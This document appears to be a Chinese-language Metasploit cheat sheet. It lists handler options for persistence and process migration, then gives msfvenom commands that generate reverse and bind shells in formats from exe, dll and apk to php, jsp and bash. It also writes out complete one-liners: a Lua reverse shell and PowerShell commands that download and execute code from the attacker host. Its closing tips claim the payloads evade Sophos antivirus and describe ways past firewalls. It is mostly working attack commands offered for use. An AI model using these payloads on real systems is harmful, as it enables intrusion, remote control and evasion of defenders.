(1) 常用高级参数选项

以下这些参数均为笔者常用,大家可以根据目标实践情况和个人需求来选择使用,更多高级参数可参考我整理的“Metasploit常用命令速查”,一定要多去实践,因为只有自己测试过后才知道其真实效果!

  1. LHOST:本地IP地址,RHOST:远程IP地址,LPORT:本地/远程端口
  2. EXITFUNC:退出方法,EXITFUNC=process(进程),EXITFUNC=thread(线程)
  3. set PrependMigrate true 启用迁移进程(默认为:false
  4. set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe
  5. set SessionExpirationTimeout 0 会话超时时间0秒(会话永不超时),默认为:604800
  6. set SessionCommunicationTimeout 0 会话通信超时0秒(会话永不过期),默认为:300
  7. set EnableStageEncoding true 启用Stage传输体载荷编码(默认为:false
  8. set EnableUnicodeEncoding true 启用Unicode编码(默认为:false
  9. set stageencoder x86/fnstenv_mov 设置传输编码为:x86/fnstenv_mov
  10. set HandlerSSLCert /tmp/772023.pem 指定HTTPS PEM格式SSL证书路径
  11. set StagerVerifySSLCert true 验证HTTPS SSL证书
  12. set ExitOnSession false 退出会话为:false,保持端口监听(默认为:true
  13. set AutoRunScript migrate -f 自动运行migrate脚本,-f或-n参数
  14. set InitialAutoRunScript migrate -f 自动运行migrate脚本,优先AutoRunScript

(2) 生成各类常用载荷

Windows reverse_tcp Jar这个载荷只有在IIS应用程序池内置账户为LocalService、LocalSystem、NetworkService时才可在Webshell下执行,ApplicationPoolIdentity和自定义账户均不能执行。

1. Mac reverse_tcp macho

  1. root@kali:~# msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f macho > /tmp/mac.macho

2. Linux reverse_tcp elf

  1. root@kali:~# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f elf > /tmp/linux.elf

3. Android reverse_tcp apk

  1. root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/android.apk

4. Windows reverse_tcp exe

  1. root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f exe > /tmp/reverse.exe

5. Windows bind_tcp exe

  1. root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=999 -f exe > /tmp/bind.exe

6. Windows reverse_https exe

  1. root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 -f exe > /tmp/https.exe
  2. 命令行执行:C:\inetpub\wwwroot\> rundll32 C:\ProgramData\https.exe

7. Windows reverse_tcp dll

  1. root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f dll > /tmp/dll_x64.dll
  2. 命令行执行:C:\inetpub\wwwroot\> rundll32 C:\ProgramData\dll_x64.dll,Start或者regsvr32 dll_x64.dll

8. Windows reverse_tcp jar

  1. root@kali:~# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f jar > /tmp/java.jar
  2. 命令行执行:C:\inetpub\wwwroot\> java -jar "C:\ProgramData\java.jar"

9. Script reverse_tcp aspx

  1. root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f aspx > /tmp/aspxweb.aspx
  2. 浏览器访问:http://192.168.1.108/aspxweb.aspx

10. Script reverse_tcp php

  1. root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/phpweb.php
  2. root@kali:~# cat phpweb.php | pbcopy && echo ‘<?php | tr -d \n > shell.php && pbpaste >> shell.php
  3. 浏览器访问:http://192.168.1.108/phpweb.php

11. Script reverse_tcp jsp

  1. root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/jspweb.jsp或者warweb.war
  2. 浏览器访问:http://192.168.1.108:8080/jspweb.jsp

12. Script reverse_tcp perl

  1. root@kali:~# msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/perl.pl
  2. 命令行执行:[/var/www/html/]$ perl /tmp/perl.pl

13. Script reverse_tcp ruby

  1. root@kali:~# msfvenom -p cmd/unix/reverse_ruby LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/ruby.rb
  2. 命令行执行:[/var/www/html/]$ ruby /tmp/ruby.rb

14. Script reverse_tcp python

  1. root@kali:~# msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/python.py
  2. 命令行执行:[/var/www/html/]$ python /tmp/python.py

15. Script reverse_lua lua

  1. root@kali:~# msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.lua
  2. 命令行执行:
  3. [/var/www/html/]$ lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('192.168.1.120',443);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"

16. Script reverse_bash bash

  1. root@kali:~# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.sh
  2. 命令行执行:[/var/www/html/]$ bash /tmp/payload.sh

17. Script reverse_tcp nodejs

  1. root@kali:~# msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.js
  2. 命令行执行:[/var/www/html/]$ nodejs /tmp/payload.js

18. Bypass hta_server mshta

  1. msf > use exploit/windows/misc/hta_server
  2. msf exploit(windows/misc/hta_server) > set target 1
  3. msf exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp
  4. msf exploit(windows/misc/hta_server) > set lhost 192.168.1.120
  5. msf exploit(windows/misc/hta_server) > set lport 443
  6. msf exploit(windows/misc/hta_server) > exploit
  7. 命令行执行:
  8. C:\inetpub\wwwroot\> mshta http://192.168.1.120:8080/xc2Pvkpa3FU6Q.hta

19. Bypass web_delivery powershell

  1. msf > use exploit/multi/script/web_delivery
  2. msf exploit(multi/script/web_delivery) > set target 2
  3. msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
  4. msf exploit(multi/script/web_delivery) > set lhost 192.168.1.120
  5. msf exploit(multi/script/web_delivery) > set lport 443
  6. msf exploit(multi/script/web_delivery) > set uripath /
  7. msf exploit(multi/script/web_delivery) > exploit
  8. 命令行执行:
  9. C:\inetpub\wwwroot\> powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.120:8080/');

20. Bypass reverse_https powerShell

  1. root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 -f psh-reflection > /var/www/html/Powershell.ps1
  2. msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
  3. msf exploit(multi/handler) > set lhost 192.168.1.120
  4. msf exploit(multi/handler) > set lport 443
  5. msf exploit(multi/handler) > exploit
  6. 命令行执行:
  7. C:\inetpub\wwwroot\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.120/Powershell.ps1'); "

(3) 注意事项

  1. 选择攻击载荷时需先查看目标服务器是32位还是64位的,一定要加载正确攻击载荷才能成功;
  2. Metasploit生成的64位攻击载荷文件默认就能躲过Sophos Anti-Virus安全软件的检测和查杀;
  3. 目标存在防火墙,拦截了与攻击机器建立一个正常TCP连接,可以尝试bind_tcp攻击载荷绕过;
  4. 目标为内网环境并存在杀毒,上传端口转发等工具时会被查杀,可以使用脚本载荷等方式绕过;

public.png